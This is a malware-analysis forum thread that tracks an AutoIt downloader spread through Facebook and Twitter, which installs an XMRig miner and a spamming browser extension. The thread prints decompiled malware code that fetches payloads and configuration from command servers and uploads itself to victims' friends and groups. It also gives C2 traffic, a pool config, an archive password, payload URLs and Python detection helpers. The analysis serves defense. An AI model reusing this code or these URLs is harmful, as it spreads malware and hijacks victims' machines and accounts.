A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32869  by Xylitol
 Sun Apr 28, 2019 2:23 pm
Saw it yesterday spreading on Facebook groups under random names, packed into .bz archives.

Image

I got 2 samples from that (they are in attachment):
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff - 989.0 KB

It's a compiled AutoIt script; it looks like it's interacting with chrome.exe (shuts it down, reopens it), but I cannot exactly replicate the behavior, it seems to have a few bugs. :|
The script is also obfuscated, which does not really help.

Files have a bit of network activity:
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478
Code:
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: C:\
ScriptName: play_12907320.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: Yes
Accept: */*
Host: fusu.icu
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:12:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=dd82fe00871874ea7410c9eac913fd5d31556410323; expires=Mon, 27-Apr-20 00:12:03 GMT; path=/; domain=.fusu.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://fusu.icu/app/7za.exe?id=3243
zip : http://fusu.icu/app/files.7z?id=3775
Server: cloudflare
CF-RAY: 4ce4d28c6c3da8db-CDG
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff:
Code:
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: Monitoring - API Monitor v2 32-bit (Administrator)
ScriptName: play_67487566.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: No
Accept: */*
Host: keke.icu
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:53:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=d44b26fd3c0765f3f834515909abca53f1556412782; expires=Mon, 27-Apr-20 00:53:02 GMT; path=/; domain=.keke.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://keke.icu/app/7za.exe?id=6986
zip : http://keke.icu/app/files.7z?id=8734
Server: cloudflare
CF-RAY: 4ce50e947c00b75f-CDG
Looking closer at keke.icu, I found it hosts a few landing pages, including:
> htxp://keke.icu/download.php
which leaks a path ("Notice: Undefined variable: id in /var/www/letask.me/site/download.php") and also leads to a malware download.

Image

So I end up with 3 domains:
- fusu.icu
- keke.icu
- letask.me

A kind of url shortener service, screenshot of main page:
Image

About the file from the landing page, it's retrieved from Amazon's cloud.
Code:
a.href = "https://s3-us-west-2.amazonaws.com/dataval/FBVideo.exe";
37f0c2bb29eaa07cb5c8649871062afe3c261caaf76c7b52d49b04a97a7262e8 - 963.5 KB - VxVault (pulled today)

This one is a year old; it's also AutoIt, but this time the code isn't obfuscated.
It appears to be a downloader for a miner:
Code:
Func getconfig()
	$xhr = ObjCreate("winhttp.winhttprequest.5.1")
	$xhr.open("GET", "https://app.uye.io/miner/config.php", False)
	$xhr.setrequestheader("User-Agent", "Miner")
	$xhr.send()
	$return = $xhr.responsetext
	If $return = "denied" Then Exit
	createappfolder()
	$data = _stringexplode($return, "#", 0)
	For $file In $data
		downloadfile($file)
	Next
	copyself()
EndFunc
So I did a few Google searches for "app.uye.io" and found this:
0bbe48aca7dfb0bb2d95e6f5e4c16562c674087552b5a16f3c8af4eb25aa6f12 - Detect.exe - 5.0 KB !
This time we have C#:
Code:
internal sealed class Detect
{
    // Methods
    [STAThread]
    public static void Main()
    {
        string location = Assembly.GetExecutingAssembly().Location;
        string str2 = "denied";
        try
        {
            using (WebClient client = new WebClient())
            {
                client.Headers[HttpRequestHeader.UserAgent] = "Miner";
                str2 = client.DownloadString("https://app.uye.io/miner/boxlog.php?path=" + location);
            }
        }
        catch (Exception exception1)
        {
            ProjectData.SetProjectError(exception1);
            Exception exception = exception1;
            ProjectData.ClearProjectError();
        }
    }
}
Very similar code, maybe a test, no idea.

A few older AutoIt samples that contact app.uye.io (also found via Google):
Video.92894831.mp4.exe - 5e455b9ee3b744c6fa036a2dca24573145a90524ab7b63ebc264fe133d2ff675 - 950.5 KB
Video.50086893.mp4.exe - 8251159756f1f33d65b3730e004b389c7778a299cbcfed86992816d7118c55d1 - 954.5 KB
Video.64931686.mp4.exe - fbad55d6119236b4cc136b67eff538afaee6c522f6bc1cb6416eb29d7381ae6c - 998.0 KB
Video.86693317.mp4.exe - c8ac7f28b6aa16368bd07ab521c648aeecddaf98fe1a0a148ae9a7162c2c0075 - 950.5 KB

The CyRadar guys saw it in December 2017, but spreading via Messenger: https://translate.google.fr/translate?s ... 7881941%2F
About the newest samples, check this write-up by VSM: https://translate.google.fr/translate?s ... &sandbox=1
Attachment: infected (990.92 KiB)
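To turn the check-in above into something a proxy log parser or IDS rule can match, here is an added example (my own code, not from the post or the malware): it fingerprints the HEAD request by its non-standard profiling headers and pulls the stage-2 URLs that the server smuggles into its response headers. The sample request/response is constructed from the fusu.icu exchange quoted above; the function names are mine.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the first check-in quoted in the post (fusu.icu).
SAMPLE_REQUEST = (
    "HEAD /app/login.php HTTP/1.1\r\nUser-Agent: Unzip\r\nWindow: C:\\\r\n"
    "ScriptName: play_12907320.mp4.com.exe\r\nOS: WIN_XP\r\nCPU: X64\r\n"
    "Installed: Yes\r\nAccept: */*\r\nHost: fusu.icu\r\nConnection: Keep-Alive\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
    "unzip : http://fusu.icu/app/7za.exe?id=3243\r\n"
    "zip : http://fusu.icu/app/files.7z?id=3775\r\nServer: cloudflare\r\n"
)

BEACON_UA = "Unzip"
PROFILE_HEADERS = ("window", "scriptname", "os", "cpu", "installed")
# The C2 smuggles stage-2 URLs into the reply as pseudo-headers "unzip : <url>" / "zip : <url>".
PAYLOAD_LINE = re.compile(r"^(unzip|zip)\s*:\s*(https?://\S+)\s*$", re.I | re.M)


def parse_headers(block: str) -> Dict[str, str]:
    """Lower-cased name -> value map of an HTTP header block (request/status line skipped)."""
    headers: Dict[str, str] = {}
    for line in block.splitlines()[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def beacon_profile(request: str) -> Optional[Dict[str, str]]:
    """Victim profile the downloader reports, or None when the request is not this
    family's check-in (HEAD /app/login.php, UA 'Unzip', all five profiling headers)."""
    lines = request.splitlines()
    if not lines or not lines[0].startswith("HEAD /app/login.php "):
        return None
    h = parse_headers(request)
    if h.get("user-agent") != BEACON_UA or not all(k in h for k in PROFILE_HEADERS):
        return None
    return {k: h[k] for k in PROFILE_HEADERS + ("host",) if k in h}


def payload_urls(response: str) -> List[str]:
    """Stage-2 URLs (7za.exe and the password-protected files.7z) from the C2 reply."""
    return [url for _, url in PAYLOAD_LINE.findall(response)]
```

The "Installed" value in the profile tells you whether the host was already infected when it checked in, which is worth keeping in the alert.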
 #32871  by Xylitol
 Sun Apr 28, 2019 7:41 pm
Another.
8b68940459c9d22ee049e77c8ed5db77ef799ab3dedd0e7b6f75e93c49e8eed1 - 992.0 KB
AnyRun has a good one about it: https://any.run/report/365167731ed69d11 ... b43cee2799

Calling:
- susu.icu
- luru.icu
Same design of URL shortener service:
Image

Miner files (XMRig):
>htxp://susu.icu/app/7za.exe?id=8308 77613cca716edf68b9d5bab951463ed7fade5bc0ec465b36190a76299c50f117
>htxp://susu.icu/app/files.7z?id=4353 5321f7b102b93e3434ff2643c9093d8f1b31a0f4cf06f79490cb8f950410fa15 (e files.7z -aoa -p KEQZmgbrmDnTpa2b4DHVMX)

config.json:
Code:
{
    "url": "pool.letask.me:3333",
    "user": "82oiGPdPx9V3ReMPJsMBFp4gTZUdq8VUr7BZuoKQTQ8d5XpCwmXSVeBNvNWfoPpvgqNiBxv1Q1ZcWA51cS9z6z9mGjugtZk",
    "pass": "x",
    "keepalive": true,
    "nicehash": false,
    "variant": -1,
    "tls": false,
    "tls-fingerprint": null
}
background.js:
Code:
var zqfgy = {};
var odhslk = function(){
	var vhwfg = "http://luru.icu/config";
	fetch(vhwfg).then(function(response){
		return response.json();
	}).then(function(data){
		zqfgy = data;
		if(data.login == true){
			zqfgy.app = chrome.app.getDetails();
			zqdtvl();
		}else{
			hzszll();
		}
	});
}
Calling luru.icu/config:
Code:
{
    "domain": "luru.icu",
    "homepage": "http://luru.icu",
    "url": "http://luru.icu/config",
    "check": "http://luru.icu/check",
    "shorten": "http://luru.icu/shorten",
    "status": true,
    "hash": "b1ccb147e149f3dfea606a15ba082060",
    "csrf": "3ab635e1686a8648246fe33928fef42e",
    "token": "YjFjY2IxNDdlMTQ5ZjNkZmVhNjA2YTE1YmEwODIwNjA=",
    "socket": "ws://luru.icu:8080",
    "ssl": false,
    "verified": true,
    "login": false
}
Related to the Facebook spreading, it drops these files:
>htxp://luru.icu/bgxvrjfk ca68a49e006012ba9542ad064c9400ad8214f8df39e3f89b2facaabd615760b2
>htxp://luru.icu/js/facebook.js?1555768638150 16fb1761df19aa27b12087b46e8093225cd48f45ab85699154f50b8f3df3a9f8
>htxp://luru.icu/js/filters.php 7a6aaedf03fadcf2c46dabd2254b9a1cba08124644e8af4d9f45a82b6d397757

A sample of code from facebook.js:
Code:
    params["filter[0]"] = "group";
    params["options[0]"] = "friends_only";
    params["options[1]"] = "nm";
    params["token"] = "v7";
    params["context"] = "mentions";
---
  var oReq = new XMLHttpRequest();
  oReq.open("GET", "https://letask.me/ajax/7z.php?ext=me", true);
  oReq.responseType = "arraybuffer";
---
facebook.uploadGroup = function(vars){
  var group = vars.group;
  var message = "Wow video ⬇🎞💖💋🔞👙😍🎞⬇";
  var getParams = {
    av: facebook.profile_id,
    album_id:"",
    asset3d_id:"",
    asked_fun_fact_prompt_data:"",
    attachment:"",
---
facebook.uploadFile = function(vars){
  var fd = new FormData();
  fd.append("upload_1025", vars.blob, "video_"+rand(11111,99999)+".bz");

How to get fresh samples?
Code:
htXp://letask.me/ajax/7z.php?ext=me
htXp://fusu.icu/ajax/7z.php?ext=me
htXp://keke.icu/ajax/7z.php?ext=me
htXp://susu.icu/ajax/7z.php?ext=me
htXp://luru.icu/ajax/7z.php?ext=me
etc...

Currently distributing 7b762687c311c32fceb61a21a710c009da8fc96ecfc06a350229d74be03d86c3 - 991.5 KB - qoqo.icu

Previously:
1c4104ca158e5e0bb8b54fa73d42bac1529c599d989eee6e0b1e6d40fa56031c - 986.0 KB - qoqo.icu
a83ec3fdd4482a42478f15207310c7980333e9b011f6f0cdfdf4b0f488a599a3 - 986.0 KB - qoqo.icu
4e5577e4b3c89c78c406e9c1d78928a4ddeb0384510654c0f4eb9a10d7b05af5 - 984.5 KB - qoqo.icu
Attachment: infected (1.58 MiB)
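As an added hunting helper (my own code, not the post's), the following identifies a dropped XMRig-style config.json like the one above by its key set and its Monero payout address, and pulls out the pool host and port for blocking or correlation. The sample input is the config.json quoted in the post, embedded as a constructed string; the function name is mine.

```python
import json
import re
from typing import Any, Dict, Optional

# Keys the dropped config.json carries (matches the sample in the post).
XMRIG_KEYS = {"url", "user", "pass", "keepalive", "nicehash", "variant"}
# Monero address: 95 base58 chars (no 0, O, I, l), leading 4 (standard) or 8 (subaddress).
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")

# Constructed sample: the config.json quoted in the post, as it would sit on disk.
SAMPLE_CONFIG = """{
    "url": "pool.letask.me:3333",
    "user": "82oiGPdPx9V3ReMPJsMBFp4gTZUdq8VUr7BZuoKQTQ8d5XpCwmXSVeBNvNWfoPpvgqNiBxv1Q1ZcWA51cS9z6z9mGjugtZk",
    "pass": "x",
    "keepalive": true,
    "nicehash": false,
    "variant": -1,
    "tls": false,
    "tls-fingerprint": null
}"""


def classify_miner_config(text: str) -> Optional[Dict[str, Any]]:
    """Return pool host/port and wallet details if `text` is an XMRig-style pool
    config, else None (non-JSON, non-object, or missing the expected keys)."""
    try:
        cfg = json.loads(text)
    except ValueError:
        return None
    if not isinstance(cfg, dict) or not XMRIG_KEYS <= set(cfg):
        return None
    # Accept both bare "host:port" and "stratum+tcp://host:port" forms.
    host_port = str(cfg.get("url", "")).split("://", 1)[-1]
    host, sep, port = host_port.rpartition(":")
    if not sep or not port.isdigit():
        return None
    wallet = str(cfg.get("user", ""))
    return {
        "pool_host": host,
        "pool_port": int(port),
        "wallet": wallet,
        "wallet_is_monero": bool(MONERO_ADDR.match(wallet)),
        "tls": bool(cfg.get("tls", False)),
    }
```

Run it over any config.json found next to 7za.exe or a renamed XMRig binary; the pool host is the network indicator to pivot on, the wallet the one that ties samples to the same operator.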
 #32877  by Xylitol
 Tue Apr 30, 2019 3:43 am
Thx, I edited the thread title according to the Trend Micro detection.
Also, here is another curiosity:
dene.exe - 574ee5f6f38fe5b63eeb0d9bd8a7934027abf2a7b7000f79fba70e4526d94f17 - 951.0 KB
Code:
Func download()
	Local $hdownload = InetGet("http://letask.me/test.php", "sa.exe", $inet_forcereload, $inet_downloadbackground)
	Do
		Sleep(250)
	Until InetGetInfo($hdownload, $inet_downloadcomplete)
	Local $ibytessize = InetGetInfo($hdownload, $inet_downloadread)
	Local $ifilesize = FileGetSize("sa.exe")
	InetClose($hdownload)
	MsgBox($mb_systemmodal, "", "The total download size: " & $ibytessize & @CRLF & "The total filesize: " & $ifilesize)
EndFunc
It downloads a file from test.php and saves it as 'sa.exe'.
Not available as of now; according to Tencent Habo, the file downloaded was 366.59 KB, not their usual sizes of 9xx KB.

About the Trend Micro paper, as 'video' landings I've seen:
htXp://letask.me/youtube.php and htXp://letask.me/blob.php

And another sample, fresh from today:
ff8655a156f9a4080430373a158bc25c0400e3dbad66a74a66efe6f740440187 - 998.5 KB - qoqo.icu

Funny, they added a token in facebook.js to stop people downloading directly from the source:
Code:
facebook.getFile = function(vars){
  var oReq = new XMLHttpRequest();
  oReq.open("GET", uri("/ajax/7z.php?ext=me&hash="+config.token), true);
  oReq.responseType = "arraybuffer";
  oReq.onreadystatechange = function() {
      if(this.readyState != 4) return;
      var arrayBufferView = new Uint8Array( this.response );
      vars.blob = new Blob( [ arrayBufferView ], { type: "application/octet-stream" } );
      if(vars.friends.length > 0){
        facebook.uploadFile(vars);
      }
      if(vars.groups.length > 0){
        for (var i = 0; i < vars.groups.length; i++) {
          vars.group = vars.groups[i];
          facebook.uploadGroup(vars);
        }
      }
  };
  oReq.send();
}
And now they seem to also target Twitter.
>htxp://qoqo.icu/js/facebook.js?1556629694498 a424c142c32d8ec4d3b74aaca1c9818f1298592d150f4b1ef8c144199b1246ce
>htxp://qoqo.icu/js/twitter.js?1556629694499 6fe4d15f5996b5a9b2429d8d25e792cd91566effc73183dd00a192ebac5204c0

Image
Fiddler session in attachment.
edit: Distribution map from Kaspersky stats: https://twitter.com/IdoNaor1/status/1123224566510379008